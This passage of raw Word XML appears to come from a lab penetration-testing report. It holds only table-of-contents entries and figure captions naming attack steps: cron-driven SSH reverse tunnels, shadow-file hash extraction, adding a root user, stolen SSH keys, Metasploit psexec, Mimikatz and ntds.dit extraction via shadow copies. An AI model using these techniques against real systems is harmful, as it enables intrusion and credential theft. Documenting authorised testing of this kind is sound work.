              <w:instrText>PAGEREF _Toc30427 \h</w:instrText>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">29 </w:t>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="49AFBCC8" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9619"/>
            </w:tabs>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc30428">
            <w:r>
              <w:t>10.2.2 Harvesting clear-text credentials with Mimikatz</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:instrText>PAGEREF _Toc30428 \h</w:instrText>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">30 </w:t>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="75EA1E6B" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9619"/>
            </w:tabs>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc30429">
            <w:r>
              <w:t>10.3 ntds.dit and the keys to the kingdom</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:instrText>PAGEREF _Toc30429 \h</w:instrText>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">30 </w:t>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="319DDFF0" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9619"/>
            </w:tabs>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc30430">
            <w:r>
              <w:t>10.3.1 Bypassing restrictions with VSC</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:instrText>PAGEREF _Toc30430 \h</w:instrText>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">31 </w:t>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="10A4D7C7" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9619"/>
            </w:tabs>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc30431">
            <w:r>
              <w:t>Conclusion</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:instrText>PAGEREF _Toc30431 \h</w:instrText>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">35 </w:t>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1EF69BC0" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
          <w:r>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="75C1DFE6" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="183" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29B781E0" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FFE4A02" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="0F4761"/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">Table of Figures </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="596A348C" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="113"/>
        <w:ind w:left="-5" w:right="256"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Diagram 2: Setting up an SSH reverse callback script using cron .................................... 10 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A6EC895" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="118" w:line="265" w:lineRule="auto"/>
        <w:ind w:right="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure 1: Creating a new SSH Key Pair ........................................................................... 11 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6711E148" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="113"/>
        <w:ind w:left="-5" w:right="256"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure 2: Enabling SSH Public Key Authentication on the Attacking Machine .................... 12 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33FC693D" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="113"/>
        <w:ind w:left="-5" w:right="256"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure 4: Verifying SSH Key Authentication from the Victim Machine ............................... 12 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="755E1A14" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="118" w:line="265" w:lineRule="auto"/>
        <w:ind w:right="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Diagram 3: Forwarding ports through an SSH tunnel ...................................................... 13 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="361B7810" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="115"/>
        <w:ind w:left="-5" w:right="256"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure 4: Verifying the Forwarder Port on the Attacking Machine ..................................... 14 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56D9CEF5" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="113"/>
        <w:ind w:left="-5" w:right="256"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure 5: Connecting to the Victim Machine Through the Forwarded SSH Tunnel .............. 15 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CE58257" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="113"/>
        <w:ind w:left="-5" w:right="256"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure 6: Creating a Bash Script and Cron Job to Automate the SSH Tunnel ..................... 16 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BC62EAE" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="113"/>
        <w:ind w:left="-5" w:right="256"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure 7: Automatic Re-establishment of the SSH Tunnel via Cron .................................. 16 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CF9926A" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="113"/>
        <w:ind w:left="-5" w:right="256"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure 8: Displaying Hidden .dot Files in the User Home Directory Using ls -la ................. 17 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D72D81B" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="113"/>
        <w:ind w:left="-5" w:right="256"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure 9: Viewing the .bash_history File to Identify Previously Executed Commands ......... 18 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59D9575A" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="113"/>
        <w:ind w:left="-5" w:right="256"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure 11: Extracting a Specific User Password Hash from the /etc/shadow File ............... 20 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01F905D8" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="113"/>
        <w:ind w:left="-5" w:right="256"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure 12:  Comparing Normal File Permissions and SUID Permissions on Linux Binaries . 21 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4961E365" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="113"/>
        <w:ind w:left="-5" w:right="256"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure 13: Creating a Password Hash for a New User Using OpenSSL .............................. 21 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B5D6ED0" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="113"/>
        <w:ind w:left="-5" w:right="256"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure 14: Adding a New Root-Level User Entry to the Modified passwd File ..................... 22 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A70F93A" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="113"/>
        <w:ind w:left="-5" w:right="256"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Table 1: The seven components of an /etc/passwd /entry ............................................... 22 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B1613D7" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="113"/>
        <w:ind w:left="-5" w:right="256"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure 15: Switching to the Pentest User and Verifying Root Privilege ............................... 23 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5903FCEA" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="113"/>
        <w:ind w:left="-5" w:right="256"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure 16: Extracting and Transferring the Stolen SSH Private Key .................................... 24 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="090A86BC" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="113"/>
        <w:ind w:left="-5" w:right="256"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> Figure 17: Authenticating to Multiple Systems Using a Stolen SSH Private Key ................ 24 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73DF9915" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="113"/>
        <w:ind w:left="-5" w:right="256"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure 18: Viewing Active Sessions Created by the Metasploit Module ............................ 25 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6400C312" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="113"/>
        <w:ind w:left="-5" w:right="256"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure 19: RDP Session from Goku to Nappa Using Test User 1 ....................................... 27 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C4880E7" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="116"/>
        <w:ind w:left="-5" w:right="256"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure 20: Identifying Logged-In User Using the Metasploit psexec_loggedin_user Module 28 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5485DEF4" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="-5" w:right="256"/>
      </w:pPr>
      <w:r>
        <w:t>Figure 21: Opening a Meterpreter Session Using the exploit/windows/smb/psexec Module</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EC729F5" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="118" w:line="265" w:lineRule="auto"/>
        <w:ind w:right="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> .................................................................................................................................. 28 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29A16463" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="113"/>
        <w:ind w:left="-5" w:right="256"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure 22: Impersonating a Domain User Token Using the Incognito Extension ................. 29 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F94EF46" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="113"/>
        <w:ind w:left="-5" w:right="256"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure 23: Harvesting clear-text credentials from memory .............................................. 30 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FAC2AF1" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="113"/>
        <w:ind w:left="-5" w:right="256"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Diagram 5: Controlling the entire Active Directory domain .............................................. 30 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AF84994" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="113"/>
        <w:ind w:left="-5" w:right="256"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Figure 24: Identifying the domain controller using a domain ping .................................... 31 Figure 25: Checking the domain controller for existing Volume Shadow Copies ............... 31 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="722B6723" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="113"/>
        <w:ind w:left="-5" w:right="256"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure 25: Accessing the shadow copy and verifying the NTDS database ......................... 32 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0620A8A6" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="113"/>
        <w:ind w:left="-5" w:right="256"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure 26: Copying the ntds.dit file from the shadow copy .............................................. 32 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DF29065" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="113"/>
        <w:ind w:left="-5" w:right="256"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure 27: Copying the SYSTEM registry hive from the shadow copy ................................ 33 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D9A2CFC" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="113"/>
        <w:ind w:left="-5" w:right="256"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure 28: Downloading the ntds.dit and SYSTEM files using smbclient.py ....................... 33 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EBCA587" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="-5" w:right="256"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure 29: Running secretsdup.py to begin extracting password hashes from the ntds.dit </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1626E7B0" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="489" w:line="265" w:lineRule="auto"/>
        <w:ind w:right="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">database using the SYSTEM registry hive ....................................................................... 34 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D9314E4" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="390" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="0F4761"/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E955362" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="390" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="0F4761"/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01ACA774" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="390" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="0F4761"/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57A0C03E" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="388" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="0F4761"/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CFBDFB8" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="390" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="0F4761"/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75C2747A" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="0F4761"/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FFB55F8" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="183" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="281DE96E" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="183" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E90EEBD" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="183" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="392390F7" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="183" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="247D3870" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="183" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72EAD8F5" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="183" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="369218A7" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="183" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DC89D01" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="183" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="343BFD24" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C6B1661" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc30407"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Table Checklist </w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="9352" w:type="dxa"/>
        <w:tblInd w:w="5" w:type="dxa"/>
        <w:tblCellMar>
          <w:top w:w="5" w:type="dxa"/>
          <w:left w:w="108" w:type="dxa"/>
          <w:bottom w:w="0" w:type="dxa"/>
          <w:right w:w="59" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="473"/>
        <w:gridCol w:w="5605"/>
        <w:gridCol w:w="1676"/>
        <w:gridCol w:w="1598"/>
      </w:tblGrid>
      <w:tr w:rsidR="00582E80" w14:paraId="1C37E8AE" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="847"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="473" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="3346924E" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">ID </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5605" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="356798F9" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">What {Figure, Table, Section} </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1676" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="62644BBE" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="22" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Where </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3CBA9635" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">{Reference} </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1598" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
            </w:tcBorders>
          </w:tcPr>
